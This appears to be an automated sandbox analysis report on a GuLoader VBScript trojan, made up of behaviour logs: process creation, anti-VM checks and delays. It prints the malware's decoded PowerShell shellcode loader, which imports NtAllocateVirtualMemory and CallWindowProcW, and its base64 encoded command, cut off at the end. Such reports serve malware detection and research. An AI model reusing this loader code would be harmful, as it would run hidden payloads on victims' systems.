    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7F9.tmp" "c:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP"Jump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220128Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\TRICA.datJump to behavior
    Source: classification engineClassification label: mal88.troj.evad.winVBS@8/11@0/0
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_01
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

    Data Obfuscation

    barindex
    VBScript performs obfuscated calls to suspicious functions
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBiAHIAaQBjAGsAIABMA", "", "", "0")
    Yara detected GuLoader
    Source: Yara matchFile source: 00000003.00000002.1189973609.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07E660A8 push eax; mov dword ptr [esp], edx3_2_07E660BC
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.dllJump to dropped file
    Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2912Thread sleep time: -4611686018427385s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.dllJump to dropped file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5373Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2280Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000003.00000002.1182278498.000000000566A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
    Source: wscript.exe, 00000001.00000003.734411949.00000169969AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\#
    Source: powershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1182278498.000000000566A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Encrypted powershell cmdline option found
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #brick Lillith Post8 Tactilesi RADICU Parrafoura Servbjer4 Buttwo8 ghent OMSK Songishmi3 CUPPERSDEX Srge9 Ingnu1 Kandelabr3 Saronic MIKEYNOTH NITRERIN TACK PIGPENB Betapart5 genioh Ugeskrif Beslagsm7 Nonpsych9 sensitiz Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Sludrech1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);}"@#cisterci punkter Temu4 PATRONES Hestek UNREFO bekrans Pampr Genbru decer Crescent Thiasusi piltst Omsorgsce Prel6 barskabesn Metathe Televsnets6 Smals7 BOOSTERI mism PINS Tndehvl1 skriv Over unpropag Test-Path "Hild3" Test-Path "Pierid" $Sludrech3=0;$Sludrech9=1048576;$Sludrech8=[Sludrech1]::NtAllocateVirtualMemory(-1,[ref]$Sludrech3,0,[ref]$Sludrech9,12288,64)#sogne sang NYTVANC Rilletpro8 popular billedm lseproc constan Subte Ilsabet9 hulkynap bevrteren Sidevi Mast Ensom1 Underscale1 Trykker
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #brick Lillith Post8 Tactilesi RADICU Parrafoura Servbjer4 Buttwo8 ghent OMSK Songishmi3 CUPPERSDEX Srge9 Ingnu1 Kandelabr3 Saronic MIKEYNOTH NITRERIN TACK PIGPENB Betapart5 genioh Ugeskrif Beslagsm7 Nonpsych9 sensitiz Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Sludrech1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);}"@#cisterci punkter Temu4 PATRONES Hestek UNREFO bekrans Pampr Genbru decer Crescent Thiasusi piltst Omsorgsce Prel6 barskabesn Metathe Televsnets6 Smals7 BOOSTERI mism PINS Tndehvl1 skriv Over unpropag Test-Path "Hild3" Test-Path "Pierid" $Sludrech3=0;$Sludrech9=1048576;$Sludrech8=[Sludrech1]::NtAllocateVirtualMemory(-1,[ref]$Sludrech3,0,[ref]$Sludrech9,12288,64)#sogne sang NYTVANC Rilletpro8 popular billedm lseproc constan Subte Ilsabet9 hulkynap bevrteren Sidevi Mast Ensom1 Underscale1 TrykkerJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAc
